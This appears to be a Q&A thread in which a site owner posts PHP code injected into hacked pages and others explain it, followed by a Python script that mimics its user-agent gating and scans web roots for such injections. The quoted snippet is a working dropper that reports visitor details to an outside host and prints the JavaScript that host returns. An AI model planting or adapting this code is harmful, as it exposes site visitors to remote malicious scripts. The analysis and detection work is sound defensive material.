Unauthorised code placed on web pages
Recently a website I have been involved with was hacked, with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light on what exactly this code does, and what benefit it would be to the user who placed it on these pages.

<?php
#31e3cd#
// Silence every error so a failed cURL call or an undefined variable never shows up on the page.
error_reporting(0); ini_set('display_errors',0);
$wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
// Only fire for user agents mentioning Gecko or MSIE (browsers), and never for anything calling itself a bot.
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
    // The callback URL is concatenated piecewise so the hostname is not one greppable string;
    // it reports the visitor's IP, the infected site's hostname and the visitor's user agent.
    $wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
    // Fetch whatever the remote server decides to return for this visitor (6 second timeout).
    $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 6);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_35639okpbo = curl_exec ($ch);
    curl_close($ch);
}
// Print the response into the page only if characters 2-4 are "scr", i.e. it begins with "<script".
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>

Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:

$_SERVER['HTTP_USER_AGENT']

It is then combined into a URL similar to the one below, but with the user information from above added to the URL:

http://html-href.com/href/?ip=::1&referer=localhost&ua=

I know curl is used in the transfer of data, but where exactly is this information getting sent and what is its purpose?

Molybdic answered 7/1, 2014 at 15:10 Comment(0)

The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's user agent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client-side code. It's probably not server-side code since there's no eval() running the code received.

It appears to target Internet Explorer, Chrome, and Firefox browsers, but not crawlers/bots.

EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.

Ketchum answered 7/1, 2014 at 15:15 Comment(7)
It's likely to be JS, since it's checking for a substring of scr as the 2nd, 3rd and 4th characters (which would match <script). - Reflate
Good call. I hadn't thought of 'script' (I'm terrible at word games!). As a result it appears to only be printing the resulting string if it's JavaScript. - Ketchum
Is the returned content likely to cause damage to a user's machine? Is it just returning a string, or could the returned content be executed, perhaps to exploit a vulnerability in one of these browsers? - Molybdic
The returned content is likely to be an exploit targeted at Firefox or Internet Explorer. The string returned is only printed if it contains a <script> tag, so it is code to be executed. Assume it's malicious and can either cause damage or perform unauthorized actions on behalf of the user's browser or machine. - Ketchum
@RobertRozas you're right. Chrome's UA string contains "like Gecko" in it. - Ketchum
Thanks for the replies, I think I have a better idea of what this code is doing now. We have the IP address of the user who accessed the site via FTP; it's a location in Spain, but I don't know if there is anything we can do with this information. - Molybdic
The best thing you can do is look into ways to better secure your server (maybe post on ServerFault?). It's my understanding that FTP is insecure and SFTP/SCP are better alternatives. No need to thank us. The best way you can show gratitude is by voting for questions/answers on SO and accepting the best answer to your questions. - Ketchum

$_SERVER['HTTP_USER_AGENT'] is used to check the kind of web browser (or crawler) from which the client requests the resource at the URL. For instance, the snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) is used to check if the client browser is Firefox (Gecko) or IE (MSIE). But this is not a foolproof way to determine the source browser, as user agents can easily be changed or switched.

Detector answered 7/1, 2014 at 15:21 Comment(0)
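As an added example (not code from the original post, nor from the site in question), the following Python reproduces the two gates described in the answers above, the Gecko/MSIE user-agent filter with its "bot" exclusion and the "scr" check on the fetched body, against constructed user-agent strings, and then turns the same features of the snippet into a scanner for a web root. The marker wrapper #31e3cd# ... #/31e3cd# seen on the page is generalized to any hex tag, which is an assumption; the sample user agents, the sample infected file and the example.invalid URL are constructed for the example, not captured data.

```python
"""Reproduce the gating logic of the injected PHP snippet and scan a web root
for the same kind of injection.  Added example, not code from the original post."""
import re
import sys
from pathlib import Path
from typing import Dict, List

# Representative user-agent strings, constructed for this example.
SAMPLE_UAS: Dict[str, str] = {
    "ie8": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "firefox": "Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0",
    "chrome": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
              "Chrome/31.0.1650.63 Safari/537.36",
    "googlebot": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; "
                 "Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36",
    "curl": "curl/7.32.0",
}


def is_targeted(user_agent: str) -> bool:
    """Same test as the PHP: preg_match('/Gecko|MSIE/i') && !preg_match('/bot/i').
    Chrome passes because its UA says 'like Gecko'; anything naming itself a bot is
    skipped, which keeps the payload out of crawler caches and automated scans."""
    return bool(re.search(r"Gecko|MSIE", user_agent, re.I)) and \
        not re.search(r"bot", user_agent, re.I)


def would_echo(body: str) -> bool:
    """substr($body, 1, 3) === 'scr': only a response beginning '<script' is printed."""
    return body[1:4] == "scr"


def targeted_samples() -> Dict[str, bool]:
    """Which of the constructed user agents would be served the payload."""
    return {name: is_targeted(ua) for name, ua in SAMPLE_UAS.items()}


# --- detection side ---------------------------------------------------------
# The snippet on the page sits between #31e3cd# and #/31e3cd#.  Assumption for this
# example: other infected files use the same wrapper with a different hex tag.
MARKER_RE = re.compile(
    r"#(?P<tag>[0-9a-f]{4,})#\s*error_reporting\s*\(\s*0\s*\);.*?#/(?P=tag)#",
    re.S | re.I,
)
# Looser indicator: error silencing plus UA check, cURL fetch and echo in one file.
DROPPER_TOKENS = ("HTTP_USER_AGENT", "curl_init", "curl_exec", "echo")


def find_injections(text: str) -> List[str]:
    """Return the marker tag of every wrapped block found in a file's text."""
    return [m.group("tag") for m in MARKER_RE.finditer(text)]


def looks_like_dropper(text: str) -> bool:
    """True if the file silences errors and carries all four dropper ingredients."""
    return bool(re.search(r"error_reporting\s*\(\s*0\s*\)", text)) and \
        all(tok in text for tok in DROPPER_TOKENS)


def scan_tree(root: str, exts=(".php", ".phtml", ".inc")) -> Dict[str, List[str]]:
    """Walk a web root; report files with marker blocks or dropper indicators."""
    hits: Dict[str, List[str]] = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        tags = find_injections(text)
        if tags:
            hits[str(path)] = tags
        elif looks_like_dropper(text):
            hits[str(path)] = ["heuristic"]
    return hits


# Constructed samples so the scanner can be checked offline.
SAMPLE_INFECTED = """<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua)) {
  $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://example.invalid/?ua=' . urlencode($ua));
  $out = curl_exec($ch); curl_close($ch); }
if (substr($out,1,3) === 'scr') { echo $out; }
#/31e3cd#
?>
"""
SAMPLE_CLEAN = "<?php\n// #todo: tidy up\necho 'hello';\n?>\n"

if __name__ == "__main__":
    for name, hit in targeted_samples().items():
        print(f"{name:10s} -> {'served payload' if hit else 'skipped'}")
    if len(sys.argv) > 1:  # e.g. python scan.py /var/www
        for path, tags in scan_tree(sys.argv[1]).items():
            print(path, tags)
```

Run it with a web root as the argument to list files carrying the wrapper or the four indicators; the heuristic will also flag legitimate code that happens to fetch with cURL and echo the result, so treat those hits as leads to read, not as verdicts. The marker search is the reliable part, and it only covers this particular wrapper style.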
